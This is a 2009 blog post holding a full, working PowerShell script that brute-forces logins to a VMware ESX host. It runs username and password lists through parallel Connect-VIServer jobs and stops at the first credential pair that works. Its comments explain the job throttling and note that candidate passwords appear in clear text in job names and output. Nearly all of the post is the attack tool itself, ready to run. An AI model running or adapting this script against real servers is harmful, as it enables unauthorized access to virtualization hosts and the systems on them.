Tuesday, September 1, 2009

Brute Force ESX Username/Password

This script brute-forces the login to a VMware ESX host by trying each username/password combination it is given. You can give it either a single username or a username file and, similarly, either a single password or a password file. You can also set how many login jobs run in parallel.

#--------------------------------------------------------------
#Description: Powershell Simple VMware ESX Login Brute Force Script
#Version: 1.0
#Author: Tim Medin
#Email: TimMedin A@T securitywhole D.O.T com
#--------------------------------------------------------------
# Parameter declaration
param (
    # Target host; prompted for interactively when not supplied.
    [Parameter(Position=0)]
    [string] $Server = $(Read-Host -prompt "Server"),

    # Single username to try (only used when -UsersFile is not given).
    [Parameter(Mandatory=$false)]
    [string] $User,

    # Single password to try (only used when -PasswordsFile is not given).
    # NOTE(review): this is a plain [string], so a value typed on the command
    # line is shown on the console like any other argument; treat transcripts
    # and history from a run as sensitive.
    [Parameter(Mandatory=$false)]
    [string] $Password,

    # Path to a file of usernames, read with Get-Content further down.
    [Parameter(Mandatory=$false)]
    [string] $UsersFile,

    # Path to a file of passwords, read with Get-Content further down.
    [Parameter(Mandatory=$false)]
    [string] $PasswordsFile,

    # Upper bound on the number of jobs queued at once (default 10).
    [Parameter(Mandatory=$false)]
    [int] $MaxJobs = 10
)

# Reaps every background job that is no longer in the "Running" state.
# Each job wraps a child job that performs the actual login attempt. A child
# job with error output is treated as a failed attempt and removed; a child
# job with no error output is treated as a working user/password pair, which
# is reported before all remaining jobs are stopped and the script exits.
#
# NOTE(review): success is inferred solely from an empty error stream on
# ChildJobs[0]; the job's own State is not inspected here, so a job that ended
# without writing an error record would also be reported as a hit -- confirm.
Function Handle-Jobs {
    Get-Job | Where-Object { $_.State -ne "Running" } | ForEach-Object {
        $job = $_

        # Guard clause: error output means the attempt failed. Discard the job
        # and move on to the next finished one ('return' ends this iteration).
        if ($job.ChildJobs[0].Error) {
            Remove-Job $job
            return
        }

        # No error output: drain the job's results without printing them.
        Receive-Job $job -Keep | Out-Null

        # The job name carries the user/password pair in clear text, so this
        # line writes a working credential to the output stream; anything that
        # captures the output (transcript, redirect, log) now holds it.
        Write-Output "Found $($job.Name)"

        # Stop and remove every remaining job, then end the script.
        Get-Job | Stop-Job
        Get-Job | Remove-Job
        exit
    }
}

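# Refuse to run without at least one username source and one password source.
# The messages name the parameters as they are actually declared
# (-UsersFile / -PasswordsFile); the earlier wording referred to
# "UserFile" / "PasswordFile", which are not parameters of this script.
if (-not ($User -or $UsersFile)) {
    throw "User or UsersFile required."
}
if (-not ($Password -or $PasswordsFile)) {
    throw "Password or PasswordsFile required."
}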

# Build the list of usernames to iterate over. -UsersFile takes precedence
# when both -UsersFile and -User are supplied; a lone -User is wrapped in a
# one-element array so the loop below handles both cases the same way.
if (-not $UsersFile) {
    $Users = @($User)
} else {
    # Get-Content yields one entry per line of the file.
    $Users = Get-Content $UsersFile
}

# Build the list of passwords to iterate over. -PasswordsFile takes precedence
# when both -PasswordsFile and -Password are supplied; a lone -Password is
# wrapped in a one-element array so the loop below handles both cases alike.
if (-not $PasswordsFile) {
    $Passwords = @($Password)
} else {
    # The candidate list is read from disk as plain text, one entry per line.
    $Passwords = Get-Content $PasswordsFile
}

# Outer loop over passwords, inner loop over users: every user is tried with
# one password before the next password is taken.
#
# Each queued job is one real https login against $Server, with at most
# $MaxJobs jobs queued at a time. On the target this is a run of login
# attempts arriving from a single source -- presumably recorded by the host as
# authentication failures; confirm against the host's own logging.
$Passwords | ForEach-Object {
    $pass = $_
    $Users | ForEach-Object {
        $usr = $_

        # Throttle: while the job table is full, reap finished jobs and
        # re-check every 5 seconds.
        while ((Get-Job).Count -ge $MaxJobs) {
            Handle-Jobs
            Start-Sleep -Seconds 5
        }

        # Arguments for Start-Job, splatted below.
        # The candidate pair is passed to Connect-VIServer as plain strings and
        # is also copied into the job name, which is how Handle-Jobs reports a
        # hit; the job table therefore holds every candidate in clear text.
        $jobArgs = @{
            InitializationScript = {Add-PSSnapin VMware.VimAutomation.Core}
            ScriptBlock          = { param($Server, $usr, $pass) Connect-VIServer -Server $Server -Protocol https -User $usr -Password $pass }
            Name                 = "User:$usr Pass:$pass"
            ArgumentList         = $Server,$usr,$pass
        }
        Start-Job @jobArgs
    }
}

Write-Output "Everything has been queued, waiting for jobs to complete"

# Drain phase: reap finished jobs every 5 seconds until the job table is
# empty. Handle-Jobs ends the script itself as soon as it sees a job whose
# child job has no error output.
do {
    Handle-Jobs
    Start-Sleep -Seconds 5
} until (-not (Get-Job))
